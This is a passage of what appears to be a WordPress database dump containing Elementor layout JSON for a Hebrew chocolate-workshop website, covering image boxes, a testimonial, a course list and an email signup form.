"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(219,57,'_elementor_version','0.4'),(221,58,'_wp_page_template','elementor_canvas'),(222,58,'_elementor_edit_mode','builder'),(223,58,'_elementor_template_type','post'),(224,58,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center 